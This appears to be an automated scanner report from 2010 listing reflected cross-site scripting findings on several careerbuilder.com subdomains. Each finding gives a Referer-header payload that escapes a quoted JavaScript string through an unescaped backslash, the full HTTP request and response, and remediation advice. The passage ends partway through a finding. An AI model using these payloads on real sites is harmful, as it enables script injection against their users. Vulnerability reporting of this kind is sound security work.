Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /en.ic/Florida_Miami/ HTTP/1.1 Host: engineering.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=bf320\'%3balert(1)//7b08174fe63
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 178984 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=d72f43f572b24972b2efa52f4a28eefa-343070775-R0-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650C934439C4FEBB9F3697A70ACC4A30F89BC587D99E7FCB86F0466BD79DE0F675097DE1E848F2627BE; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:26:14 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:41:14 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL10 Date: Sun, 14 Nov 2010 22:26:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - bf320\\';alert(1)//7b08174fe63'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad8f2\'%3balert(1)//7e60a15d1a0 was submitted in the Referer HTTP header. This input was echoed as ad8f2\\';alert(1)//7e60a15d1a0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ex.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh038 HTTP/1.1 Host: executive.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=ad8f2\'%3balert(1)//7e60a15d1a0
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 182208 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=285e7bc95bcf4765ac323d1f3a5cd566-343070978-w8-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650563CAEFB6F49013C68D48654BAB97E6714F1ED96F756EC007C80FD378BB3C502B2BA22B7D0E6ACC9; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:38 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:39 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR8 Date: Sun, 14 Nov 2010 22:29:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - ad8f2\\';alert(1)//7e60a15d1a0'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27deb\'%3balert(1)//c82a10adf34 was submitted in the Referer HTTP header. This input was echoed as 27deb\\';alert(1)//c82a10adf34 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ex.ic/Florida_Miami/ HTTP/1.1 Host: executive.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=27deb\'%3balert(1)//c82a10adf34
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 182490 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=943d9a01a3bd49ffbe22b15c1fecb4bc-343070823-wh-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC65013830758431F9142C99B2D471F8399A9D3BF99BA5FBD7D4CB68BB4C033B9B7038DD53EC9DE66149D; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:27:02 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:42:03 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR18 Date: Sun, 14 Nov 2010 22:27:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 27deb\\';alert(1)//c82a10adf34'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6cbbd\'%3balert(1)//4db0c04994f was submitted in the Referer HTTP header. This input was echoed as 6cbbd\\';alert(1)//4db0c04994f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /gv.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh093 HTTP/1.1 Host: gov.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=6cbbd\'%3balert(1)//4db0c04994f
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 170307 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=1ff0a70ddaa14b46b98770647b278c59-343071057-wk-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6500BD0804081CEC41F23692E748750E554184C223359C7DC58908A2F8A68C7BA4E516838FCE395886D; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:30:57 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:45:57 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR21 Date: Sun, 14 Nov 2010 22:30:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 6cbbd\\';alert(1)//4db0c04994f'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f16e\'%3balert(1)//9166255ca83 was submitted in the Referer HTTP header. This input was echoed as 7f16e\\';alert(1)//9166255ca83 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /gv.ic/Florida_Miami/ HTTP/1.1 Host: gov.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=7f16e\'%3balert(1)//9166255ca83
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 170334 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=22236676820b445c909e30e65e8f79bf-343070903-wh-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650EF11BDE859ABA9A90261078DF30F6939302BEAAAF6D5ADDB3F362D74C5957E210DA2EE94347B60BD; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:28:22 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:43:23 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR18 Date: Sun, 14 Nov 2010 22:28:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 7f16e\\';alert(1)//9166255ca83'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac4c3\'%3balert(1)//eaade0cb9cb was submitted in the Referer HTTP header. This input was echoed as ac4c3\\';alert(1)//eaade0cb9cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /hc.ic/Florida_Miami/ HTTP/1.1 Host: healthcare.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=ac4c3\'%3balert(1)//eaade0cb9cb
Response
HTTP/1.1 404 Not Found Cache-Control: private Content-Length: 42282 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=1f414345368b4484b11978f8142bfe88-343070839-RT-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6506771D7B630D98E2C8CB55BD83C5ACB7C9A49FC5D48CD69CDCC29AE5D163054B6A25256F1E33A4C02; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:27:18 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: REBEL29 Date: Sun, 14 Nov 2010 22:27:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> 404 Fi ...[SNIP]... erver='healthcare'; s_cb.eVar8='healthcare.careerbuilder.com/404.aspx'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - ac4c3\\';alert(1)//eaade0cb9cb'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68272\'%3balert(1)//5817376056d was submitted in the Referer HTTP header. This input was echoed as 68272\\';alert(1)//5817376056d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /hc.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh039 HTTP/1.1 Host: healthcare.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=68272\'%3balert(1)//5817376056d
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Length: 42283 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=515ec8f819df4c2a8d429d934b081d1c-343070843-RH-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC65040AEAF52570DA9D5DB4A733819D02ACFD71E6DE065AEB3F4864BA0F1958561723907E15094A14338; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:27:22 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: REBEL17 Date: Sun, 14 Nov 2010 22:27:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> 404 Fi ...[SNIP]... erver='healthcare'; s_cb.eVar8='healthcare.careerbuilder.com/404.aspx'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 68272\\';alert(1)//5817376056d'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7befc\'%3balert(1)//e0acdb9b82a was submitted in the Referer HTTP header. This input was echoed as 7befc\\';alert(1)//e0acdb9b82a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /hr.ic/Florida_Miami/ HTTP/1.1 Host: human-resources.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=7befc\'%3balert(1)//e0acdb9b82a
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 179875 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=5606b43b8dd342f69498a5b6c0de95cc-343070910-R6-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650C37CB332FDAB9F2B708ED2F7402BA7121C3D3EF92C974470509A0268744A68B47BF198A2C7D24463; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:28:30 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:43:30 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL6 Date: Sun, 14 Nov 2010 22:28:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 7befc\\';alert(1)//e0acdb9b82a'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83819\'%3balert(1)//8746cb8e2b7 was submitted in the Referer HTTP header. This input was echoed as 83819\\';alert(1)//8746cb8e2b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /hr.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh041 HTTP/1.1 Host: human-resources.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=83819\'%3balert(1)//8746cb8e2b7
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 179814 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=dc54ef0b04d74eb1976108f9e4a21640-343071061-R4-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650BAC105645DC706337E5456437048FD993624CEB11E89408756A5E6B325D6E83890A2FCEBB4CC76B2; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:31:00 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:46:01 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL4 Date: Sun, 14 Nov 2010 22:31:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 83819\\';alert(1)//8746cb8e2b7'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ead14\'%3balert(1)//d413ee6966c was submitted in the Referer HTTP header. This input was echoed as ead14\\';alert(1)//d413ee6966c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /it.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh042 HTTP/1.1 Host: information-technology.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=ead14\'%3balert(1)//d413ee6966c
Response (redirected)
